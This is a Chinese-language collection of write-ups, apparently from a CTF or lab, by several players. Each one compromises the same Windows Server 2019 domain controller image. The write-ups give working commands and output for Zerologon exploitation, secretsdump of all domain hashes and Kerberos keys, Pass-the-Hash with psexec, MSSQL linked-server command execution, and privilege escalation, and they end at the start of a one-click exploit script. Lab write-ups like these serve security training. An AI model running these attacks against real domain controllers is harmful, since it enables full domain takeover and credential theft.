WinRM 端口（5985/5986）被防火墙过滤，改用 impacket-psexec 进行 Pass-the-Hash：

Pass-the-Hash 原理：Windows NTLM 认证使用 NT Hash 直接计算响应值，无需明文密码即可通过认证。

impacket-psexec Administrator@192.168.81.124 \
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168

成功获得 Shell：

5. 权限确认

whoami

攻击链

挂载硬盘 → 提取 NTDS → 获取 NT Hash → Pass-the-Hash → SYSTEM 权限

最终权限

域控完全沦陷

本地

nt authority\system

域内

Domain Admins + Enterprise Admins + Schema Admins

NikoCat（Zerologon）

端口扫描

[731ms]     已选择服务扫描模式
[731ms]     开始信息扫描
[731ms]     最终有效主机数量: 1
[731ms]     开始主机扫描
[731ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[737ms]     有效端口数量: 65535
[748ms] [*] 端口开放 192.168.56.101:389
[753ms] [*] 端口开放 192.168.56.101:139
[754ms] [*] 端口开放 192.168.56.101:593
[755ms] [*] 端口开放 192.168.56.101:80
[755ms] [*] 端口开放 192.168.56.101:445
[755ms] [*] 端口开放 192.168.56.101:88
[755ms] [*] 端口开放 192.168.56.101:53
[755ms] [*] 端口开放 192.168.56.101:135
[755ms] [*] 端口开放 192.168.56.101:464
[3.7s] [*] 端口开放 192.168.56.101:636
[6.8s] [*] 端口开放 192.168.56.101:1433
[15.8s] [*] 端口开放 192.168.56.101:3268
[15.8s] [*] 端口开放 192.168.56.101:3269
[45.8s] [*] 端口开放 192.168.56.101:9389
[4m6s] [*] 端口开放 192.168.56.101:49668
[4m6s] [*] 端口开放 192.168.56.101:49671
[4m6s] [*] 端口开放 192.168.56.101:49690
[4m6s] [*] 端口开放 192.168.56.101:49670
[5m6s] [*] 端口开放 192.168.56.101:61436
[5m30s]     扫描完成, 发现 19 个开放端口
[5m30s]     存活端口数量: 19
[5m30s]     开始漏洞扫描
[5m30s] [*] 网站标题 http://192.168.56.101     状态码:200 长度:157    标题:CASTLEVANIA Portal
[5m30s] [*] NetInfo 扫描结果
目标主机: 192.168.56.101
主机名: CASTLEVANIA
发现的网络接口:
   IPv4地址:
      └─ 192.168.56.101
[5m30s] [+] NetBios 192.168.56.101  DC:XMCVE\CASTLEVANIA
[5m30s]     POC加载完成: 总共387个，成功387个，失败0个
[5m31s]     扫描已完成: 13/13

没洞啊？只能从IIS突破一下

dirsearch没结果

IIS

搜索半天发现神秘工具 iis_shortname_scan.py

房主有神器

Server is vulnerable, please wait, scanning...
[+] /i~1.*      [scan in progress]
[+] /p~1.*      [scan in progress]
[+] /in~1.*     [scan in progress]
[+] /po~1.*     [scan in progress]
[+] /ind~1.*    [scan in progress]
[+] /poo~1.*    [scan in progress]
[+] /inde~1.*   [scan in progress]
[+] /poo_~1.*   [scan in progress]
[+] /index~1.*  [scan in progress]
[+] /poo_c~1.*  [scan in progress]
[+] /poo_co~1.* [scan in progress]
[+] /poo_co~1.t*        [scan in progress]
[+] /poo_co~1.tx*       [scan in progress]
[+] /poo_co~1.txt*      [scan in progress]
[+] File /poo_co~1.txt* [Done]

0 Directories, 1 Files found in total
Note that * is a wildcard, matches any character zero or more times.

也就是说有个叫/poo_co~1.txt*的东西，但是我们不知道具体的文件名无法下载

直接上bing搜索，发现神秘复现文章 https://snowscan.io/htb-writeup-poo/#

虽然我没有fuzz，但是我有搜索引擎，所以我获得了神秘的poo_connection.txt

server=localhost;
user=wuwupor;
password=lovlyBaby
database=master

MSSQL

入侵神秘数据库，用户本身只是普通public权限，但是发现存在linked server数据库

看一下在poo_public的权限

在POO_PUBLIC上用户被映射为sa

试试命令执行

可以直接命令执行，手动编译一个vshell，注意这里只能反连（因为有域防火墙）。vshell默认的脚本放的public文件夹，数据库用户访问不了。

域内用户

上线以后看一下域内用户

这个mowen用户和p2zhh用户有点说法，拿出来进行一个smb爆破

挂了快一个小时，爆出来了。当然这里可以直接上msf马，当时糖了

由于没开远程桌面，直接登录

Msfconsole

上一个msf马，依旧反连，而且莫名其妙地只能打上x32的马，x64的马就是出不来

use post/multi/recon/local_exploit_suggester

扫出来一坨

Zerologon

使用cve_2020_0787的exp

由于靶机患了抑郁症，x64的反连shell一直打不出来，只能直接传exp上去了

这里使用 https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION 即可一把梭

此处获得了system shell，相当于已经有管理员权限

onehang （Zerologon）

信息收集

端口扫描

先ipconfig看一下启动的靶机的地址，得到host-only的网卡IP是192.168.56.1，说明靶机在192.168.56.0/24网段 nmap扫一下

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# nmap -sn 192.168.56.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-2820:35 CST
Nmap scan report for[1].168.56.1 Host is up (0.00044s latency).
Nmap scan report for192.168.56.100 Host is up (0.00063s latency).
Nmap scan report for192.168.56.103 Host is up (0.0015s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in16.51 seconds

发现了两个目标：

SMB签名：已启用且强制

有两个重要的攻击面：Web 网站和 MSSQL。

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# nmap -sV -sC -p- --min-rate 5000 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-2820:36 CST
Nmap scan report for[2].168.56.103 Host is up (0.00062s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods:
|_  Potentially risky methods: TRACE
|_http-title: CASTLEVANIA Portal
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-2812:37:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-
First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 201613.00.5026.00; SP2
|_ssl-date: 2026-03-28T12:38:38+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
|   192.168.56.103:1433: |     Target_Name: XMCVE
|     NetBIOS_Domain_Name: XMCVE
|     NetBIOS_Computer_Name: CASTLEVANIA
|     DNS_Domain_Name: XMCVE.local
|     DNS_Computer_Name: CASTLEVANIA.XMCVE.local
|     DNS_Tree_Name: XMCVE.local
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-28T12:32:49
|_Not valid after:  2056-03-28T12:32:49 | ms-sql-info:
|   192.168.56.103:1433:
|     Version:
|       name: Microsoft SQL Server 2016 SP2
|       number: 13.00.5026.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-
First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASTLEVANIA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|   date: 2026-03-28T12:37:58
|_  start_date: N/A | smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_nbstat: NetBIOS name: CASTLEVANIA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7d:4a:d4 (PCS 
Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in120.46 seconds

主机名	CASTLEVANIA
域名	XMCVE.local
FQDN	CASTLEVANIA.XMCVE.local
操作系统	Windows Server 2019
关键服务	IIS 网站(80), MSSQL 2016(1433), AD域控(88/389/445)

添加 hosts 并查看网站

没有什么信息

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# echo "192.168.56.103 CASTLEVANIA CASTLEVANIA.XMCVE.local XMCVE.local" >> /etc/hosts
┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# curl http://192.168.56.103 •<!DOCTYPE html>
<html>
<head><title>CASTLEVANIA Portal</title></head>
<body>
<h1>Employee Portal</h1>
<p>Under maintenance...</p>
</body>
</html>

枚举

SMB匿名枚举

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# smbclient -L //192.168.56.103 -N session setup failed: NT_STATUS_ACCESS_DENIED

LDAP匿名枚举

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# ldapsearch -x -H ldap://192.168.56.103 -b "DC=XMCVE,DC=local" -s base # extended LDIF

#
# LDAPv3
# base <DC=XMCVE,DC=local> with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
# search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A37, comment: In order to perform this opera  tion a successful bind must be completed on the connection., data 0, v4563 # numResponses:

Web 目录爆破

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# dirsearch -u http://192.168.56.103
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html   from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /mnt/c/Users/onehang/reports/http_192.168.56.103/_26-03-28_20-50-40.txt Target: http://192.168.56.103/
[20:50:40] Starting:
[20:50:40] 403-  312B  - /%2e%2e//google.com
[20:50:40] 403-  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[20:50:42] 403-  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[20:50:47] 403-  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

枚举域用户

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# crackmapexec smb 192.168.56.103 -u '' -p '' --rid-brute
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         192.168.56.103  445    CASTLEVANIA      [*] Windows 10 / Server 2019 Build 17763 x64 
(name:CASTLEVANIA) (domain:XMCVE.local) (signing:True) (SMBv1:False)
SMB         192.168.56.103  445    CASTLEVANIA      [-] XMCVE.local\: STATUS_ACCESS_DENIED
SMB         192.168.56.103  445    CASTLEVANIA      [-] Error creating DCERPC connection: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

mssql 弱口令

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# crackmapexec mssql 192.168.56.103 -u 'sa' -p 'password' --local-auth
MSSQL       192.168.56.103  1433   CASTLEVANIA      [*] Windows 10 / Server 2019 Build 17763
(name:CASTLEVANIA) (domain:CASTLEVANIA)
MSSQL       192.168.56.103  1433   CASTLEVANIA      [-] ERROR(CASTLEVANIA): Line 1: Login failed for user 
'sa'.

枚举Kerberos用户

找到 3 个有效用户，尝试 AS-REP Roasting（检查是否有用户不需要 Kerberos 预认证）

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# nmap -p 88 --script krb5-enum-users --script-args krb5-enumusers.realm='XMCVE.local',userdb=/tmp/users.txt 192.168.56.103
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-2820:52 CST
Nmap scan report for CASTLEVANIA (192.168.56.103) Host is up (0.00056s latency).
PORT   STATE SERVICE
88/tcp open  kerberos-sec | krb5-enum-users:
| Discovered Kerberos principals
|     admin@XMCVE.local
|     administrator@XMCVE.local
|_    alucard@XMCVE.local
Nmap done: 1 IP address (1 host up) scanned in0.18 seconds

AS-REP Roasting

┌──(root㉿LAPTOP-UTBE3HPF)-[/mnt/c/Users/onehang]
└─# impacket-GetNPUsers XMCVE.local/ -usersfile /tmp/users.txt -dc-ip 192.168.56.103 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User alucard doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

都防护的挺死的没什么可以打的点，目前打的渗透不多但是基本上每次都要打cve，并且感觉windows server 2019可能有cve，搜索一下

发现windows server 2019在CVE-2020-1472的影响版本中，尝试利用

Zerologon

hash dump

利用成功，接下来dump域内所有用户的哈希

用户	NTLM 哈希
Administrator	d94f9831271e229dbc6e712097b63168
Alucard	d94f9831271e229dbc6e712097b63168
krbtgt	1e3c4fe72e1383c576b4b3aeef4730a8
sqlsvc	d93ef04edb808c5bce3a5bd67b936ca9

hash login

psexec

使用Administrator 的哈希登录-system

wmiexec

wmiexec连接才是administrator

Skywalker_Han（Zerologon）

kerbrute

$ kerbrute userenum --dc $ip -d XMCVE.local /home/hank/tools/dic/us
__             __               __        / /_____  _____/ /_  _______  __/ /____   / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \  / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                   
Version: v1.0.3 (9dad6e1) - 03/28/26 - Ronnie Flathers @rop nop
2026/03/28 09:51:01 >  Using KDC(s):
2026/03/28 09:51:01 >  10.200.26.154:88
2026/03/28 09:51:01 >  [+] VALID USERNAME: admin@XMCVE.local
2026/03/28 09:51:01 >  [+] VALID USERNAME: sales@XMCVE.local
2026/03/28 09:51:02 >  [+] VALID USERNAME: support@XMCVE. local
2026/03/28 09:51:10 >  [+] VALID USERNAME: administrator@XMCVE.local
2026/03/28 09:51:10 >  [+] VALID USERNAME: Admin@XMCVE.lo cal
2026/03/28 09:51:24 >  [+] VALID USERNAME: alucard@XMCVE.local
2026/03/28 09:52:09 >  [+] VALID USERNAME: Alucard@XMCVE. local
2026/03/28 09:52:14 >  [+] VALID USERNAME: Administrator@XMCVE.loca

端口扫描

$ fscan -h 10.200.26.154
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │ 
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2026-03-28 09:45:58] [INFO] 暴⼒破解线程数: 1
[2026-03-28 09:45:58] [INFO] 开始信息扫描
[2026-03-28 09:45:58] [INFO] 最终有效主机数量: 1
[2026-03-28 09:45:58] [INFO] 开始主机扫描
[2026-03-28 09:45:58] [INFO] 有效端⼝数量: 233
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:139
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:88
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:1433
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:80
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:389
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:445
[2026-03-28 09:45:59] [SUCCESS] 端⼝开放 10.200.26.154:135
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:139 =>Banner:[.]
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:88 => 
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:1433 => [ms-sql-s] 版]
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:80 => [http]
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:389 =
[2026-03-28 09:46:04] [SUCCESS] 服务识别 10.200.26.154:445 =

timeroast-时钟烘焙

└─$ python timeroast.py $ip 
1001:$sntp-ms$cc55305a19f98b32c9531c0c6ee10342$1c0111e90000 0000000a02c44c4f434ced7257d9052ad312e1b8428bffbfcd0aed725b7 ebd3b0666ed725b7ebd3b47d4

zerologon

简单看了下没有匿名端⼝，时钟烘焙破解不出，web没信息，开始查看历史漏洞，发现存在CVE2020 1472，我感觉是⾮预期解。要不然真的有点太简单了，不过确实拿下了

└─$ python3 zerologon_tester.py CASTLEVANIA $ip Performing authentication attempts...
===========================================================
===========================================================
===== Success! DC can be fully compromised by a Zerologon attack.
nxc smb $ip  -u '' -p '' -M zerologon SMB         10.200.26.154   445    CASTLEVANIA      [*] Win dows 10 / Server 2019 Build 17763 x64 (name:CASTLEVANIA) (d omain:XMCVE.local) (signing:True) (SMBv1:False) SMB         10.200.26.154   445    CASTLEVANIA      [-] XMCVE.local\: STATUS_ACCESS_DENIED 
ZEROLOGON   10.200.26.154   445    CASTLEVANIA      VULNERA
BLE ZEROLOGON   10.200.26.154   445    CASTLEVANIA      Next st ep: https://github.com/dirkjanm/CVE-2020-1472 直接dumphash

secretsdump

└─$ impacket-secretsdump -no-pass -just-dc CASTLEVANIA\$@$i p
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthas h) 
[*] Using the DRSUAPI method to get NTDS.DIT secrets 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831 271e229dbc6e712097b63168:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e3c4fe72e1383c 576b4b3aeef4730a8:::
Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e2 29dbc6e712097b63168::: XMCVE.local\p2zhh:1104:aad3b435b51404eeaad3b435b51404ee:bc2 bf43119e258bcecf71d44abc29db7::: XMCVE.local\mowen:1105:aad3b435b51404eeaad3b435b51404ee:efb 5fa49a38497a71e144f690860688e:::
XMCVE.local\sales:1106:aad3b435b51404eeaad3b435b51404ee:2b5 76acbe6bcfda7294d6bd18041b8fe::: XMCVE.local\support:1107:aad3b435b51404eeaad3b435b51404ee:2 b576acbe6bcfda7294d6bd18041b8fe::: XMCVE.local\it:1108:aad3b435b51404eeaad3b435b51404ee:2b576a cbe6bcfda7294d6bd18041b8fe::: XMCVE.local\hr:1109:aad3b435b51404eeaad3b435b51404ee:2b576a cbe6bcfda7294d6bd18041b8fe::: XMCVE.local\admin:1110:aad3b435b51404eeaad3b435b51404ee:2b5 76acbe6bcfda7294d6bd18041b8fe:::
XMCVE.local\sqlsvc:1112:aad3b435b51404eeaad3b435b51404ee:d9 3ef04edb808c5bce3a5bd67b936ca9::: CASTLEVANIA$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0 d16ae931b73c59d7e0c089c0::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:13e54f64708d675c0a54e b4b40e2ca21b2fcb3e6298969d741fc6e70a9367786 Administrator:aes128-cts-hmac-sha1-96:aafdd9e5c02b41dece2a8
3b2d9b4439c Administrator:des-cbc-md5:80584683e63d5845 krbtgt:aes256-cts-hmac-sha1-96:2392ad160e585e1448c5ca4623b9 ad48789c267c6488a0074dd86e98457fb5fc krbtgt:aes128-cts-hmac-sha1-96:7d55d129c8fe6c50aa87cb542775 f0a0
krbtgt:des-cbc-md5:e570376eb538c132 Alucard:aes256-cts-hmac-sha1-96:638ca0d75cc190cb5e378f1763d cb62c86e72b88c3daea8b4fbe22071cfe38c2 Alucard:aes128-cts-hmac-sha1-96:af36315453c02abbe2c811ee7fd c5b56Alucard:des-cbc-md5:585e80b09b6eb561
XMCVE.local\p2zhh:aes256-cts-hmac-sha1-96:ded2395cf838fe474
403b924638ba43ab5bf6f86f6924a172f42158f89523f58
XMCVE.local\p2zhh:aes128-cts-hmac-sha1-96:a8bf626e448308048
849c8c607846308
XMCVE.local\p2zhh:des-cbc-md5:386df4e008e96813
XMCVE.local\mowen:aes256-cts-hmac-sha1-96:15163711bf2b1f9b5
292a92e92b04a5985e1cb4af3f39c02eec442acf69f8268
XMCVE.local\mowen:aes128-cts-hmac-sha1-96:fab8fe129984295f1
8a99dcf365e654c
XMCVE.local\mowen:des-cbc-md5:231c7a2a3708029d
XMCVE.local\sales:aes256-cts-hmac-sha1-96:16ca24589ae3946d2
703f01517ce6690ba5f047caee666ac1d8fb080818b38d9
XMCVE.local\sales:aes128-cts-hmac-sha1-96:b89a5e96aa7076406
58d8cd44346d373
XMCVE.local\sales:des-cbc-md5:735125852ad66dd6 XMCVE.local\support:aes256-cts-hmac-sha1-96:18b8e74980ad358 e873dd99697c2e03c45cba28d44fda669cb311228fce34f74 XMCVE.local\support:aes128-cts-hmac-sha1-96:ec7850f423890ba
5c01a4968e18916f9
XMCVE.local\support:des-cbc-md5:389bfee35e4f7620
XMCVE.local\it:aes256-cts-hmac-sha1-96:9a449caeff406780cd9d
064fd51524df50eae35fcef19915a0ac5dfbd2afdaaf XMCVE.local\it:aes128-cts-hmac-sha1-96:53ec1190fb189b97c666 c2dc199a1132 XMCVE.local\it:des-cbc-md5:1c2686548a9d4a16
XMCVE.local\hr:aes256-cts-hmac-sha1-96:de4a4f2a15ef2a47f055
791f5042a376090cee935dd1907f6efd8ca3bd4e8fa4 XMCVE.local\hr:aes128-cts-hmac-sha1-96:6bafbe4835641707bf1e a4f16510e016 XMCVE.local\hr:des-cbc-md5:ce9113948c738913
XMCVE.local\admin:aes256-cts-hmac-sha1-96:2e64fb40f4b6b9d9c
280f7ff87a7f2c37167d53d28352684b2fd53cd3d9c135a
XMCVE.local\admin:aes128-cts-hmac-sha1-96:741a205f3dbe24d95
9f2ced9e7cfea8b
XMCVE.local\admin:des-cbc-md5:49d9c74562bca1ce XMCVE.local\sqlsvc:aes256-cts-hmac-sha1-96:908e3dfe7822951c c25e6639a69a568708050cca32159836d83f977d982874feXMCVE.local\sqlsvc:aes128-cts-hmac-sha1-96:adbd4b00d8ac0d8d
4f0b0f5a7ee3999b
XMCVE.local\sqlsvc:des-cbc-md5:e9a292087902f10d CASTLEVANIA$:aes256-cts-hmac-sha1-96:fc320757aa82369c8e3e68 a68b43f1afc78f1c8f4c86a08a9c11cd822cbce051 CASTLEVANIA$:aes128-cts-hmac-sha1-96:bdfe62da40fc7daf73f4ab d6549e431a CASTLEVANIA$:des-cbc-md5:375162a731320467

nxc

└─$ nxc smb $ip -u Administrator -H d94f9831271e229dbc6e712097b63168 
SMB         10.200.26.154   445    CASTLEVANIA      [*] Win dows 10 / Server 2019 Build 17763 x64 (name:CASTLEVANIA) (domin:XMCVE.local) (signing:True) (SMBv1:False) 
SMB         10.200.26.154   445    CASTLEVANIA      [+] XMC VE.local\Administrator:d94f9831271e229dbc6e712097b63168 (Pwn3d!)

psexec

└─$ impacket-psexec "XMCVE.local/administrator@$ip" -hashes :d94f9831271e229dbc6e712097b63168 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Requesting shares on 10.200.26.154.....
[*] Found writable share ADMIN$
[*] Uploading file LxghSxwo.exe [*] Opening SVCManager on 10.200.26.154.....
[*] Creating service hrnm on 10.200.26.154.....
[*] Starting service hrnm.....
[!] Press help for extra shell commands                      
Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation????????  
C:\Windows\system32> so fucking ez'so' is not recognized as an internal or external command, operable program or batch file.

ai幻神之力（本地挂载）

详细复现过程

1. 本地搭建

题目附件是整机镜像 Bloodstained.ova。本地没有直接可用的官方 VirtualBox 7.2.0 图形界面环境，所以我直接用 VBoxManage.exe 做手工导入和挂盘。

实际跑通时使用到的关键环境如下：

C:\Program Files\ldplayer9box\VBoxManage.exe
D:\Python\Python311\python.exe
D:\Python\Python311\Scripts\secretsdump.py
wsl.exe -d kali-linux

处理方式不是直接 VBoxManage import，而是：

从 Bloodstained.ova 解出 Bloodstained.ovf 和 Bloodstained 1-disk001.vmdk
把 streamOptimized 的 VMDK 转成可直接挂载的 VDI
手工创建 Windows2019_64 虚拟机并挂盘
配置 NAT 端口转发

端口转发实际使用的是：

127.0.0.1:18080 -> 80
127.0.0.1:10389 -> 389
127.0.0.1:11433 -> 1433
127.0.0.1:10445 -> 445

虚拟机启动后，确认到：

主机名：CASTLEVANIA
域名：XMCVE.local

2. 在线确认与离线取证

先做最小在线确认：

Web 首页在 http://127.0.0.1:18080/
LDAP RootDSE 匿名可读
defaultNamingContext: DC=XMCVE,DC=local
dnsHostName: CASTLEVANIA.XMCVE.local

随后改走离线链路，从 VMDK 里直接导出关键文件：

/Windows/NTDS/ntds.dit
/Windows/System32/config/SYSTEM
/Windows/System32/config/SECURITY
/inetpub/wwwroot

站点目录里还可以看到一个明文连接文件 poo_connection.txt：

server=localhost;
user=wuwupor;
password=lovlyBaby
database=master

这说明题目环境里确实存在 IIS + MSSQL，但这组数据库凭据本身不是最后拿管理员 shell 的关键。

3. 离线导出域控凭据

对离线导出的三件套执行：

python secretsdump.py -system offline/hives/SYSTEM \
  -security offline/hives/SECURITY \
  -ntds offline/hives/ntds.dit LOCAL

得到两个关键结果：

一是 LSA Secret 里有 MSSQL 服务口令：

_SC_MSSQLSERVER
(Unknown User):Sql!2026

二是直接解出了域控账号哈希，其中最关键的是：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
XMCVE.local\sqlsvc:1112:aad3b435b51404eeaad3b435b51404ee:d93ef04edb808c5bce3a5bd67b936ca9:::

这里 Administrator 的 NTLM 为：

d94f9831271e229dbc6e712097b63168

4. 拿管理员 shell

最终没有再依赖单独的 psexec_anyport.py。现在的做法是把远程执行逻辑直接写进一个单文件脚本里：

从 artifacts_secretsdump.txt 自动提取 Administrator 哈希
连接 127.0.0.1:10445
通过 svcctl 创建临时服务
用 cmd.exe 落一个临时 .bat
执行 whoami 和 hostname
从 ADMIN$\\Temp\\ 把输出回读回来

实测输出为：

whoami    -> nt authority\system
hostname  -> CASTLEVANIA

这说明已经在目标域控上拿到了 NT AUTHORITY\SYSTEM 级别的命令执行，满足“拿到 Administrator shell”的要求。

5. 一键脚本说明

现在只保留一份主脚本：

babydc_unified.py

它包含两个入口：

python .\babydc_unified.py full
python .\babydc_unified.py verify

含义分别是：

full：从当前目录里的 Bloodstained.ova 出发，完成虚拟机准备、离线导出、secretsdump、管理员权限验证
verify：如果 artifacts_secretsdump.txt 已经存在，只做管理员 shell 校验

我实际跑通的命令是：

D:\Python\Python311\python.exe .\babydc_unified.py --python D:\Python\Python311\python.exe verify
D:\Python\Python311\python.exe .\babydc_unified.py --python D:\Python\Python311\python.exe full

其中 full 模式在虚拟机刚启动时，域控服务有一个短暂的未就绪窗口，所以脚本里加入了自动重试。实测会在若干次 STATUS_LOGON_FAILURE 之后继续跑通，这属于正常现象。

一键可复现代码

当前最终版脚本全文如下，直接保存为 babydc_unified.py 即可使用：

import argparse
import os
import random
import re
import shutil
import string
import subprocess
import sys
import time
from pathlib import Path

from impacket.dcerpc.v5 import scmr, transport


ROOT = Path(__file__).resolve().parent
VM_NAME = "Bloodstained"
DEFAULT_OVA = ROOT / "Bloodstained.ova"
DEFAULT_OVF = ROOT / "Bloodstained.ovf"
DEFAULT_VMDK = ROOT / "Bloodstained 1-disk001.vmdk"
DEFAULT_VM_DIR = ROOT / "vm" / VM_NAME
DEFAULT_VDI = DEFAULT_VM_DIR / f"{VM_NAME}.vdi"
